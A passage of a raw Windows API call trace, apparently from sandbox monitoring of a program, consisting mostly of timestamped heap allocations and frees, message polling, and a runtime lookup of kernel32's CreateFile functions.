dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.555] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.555] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.555] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.555] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.555] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.555] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.558] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.560] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889730 [0043.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889730, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.561] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0043.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.561] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.561] 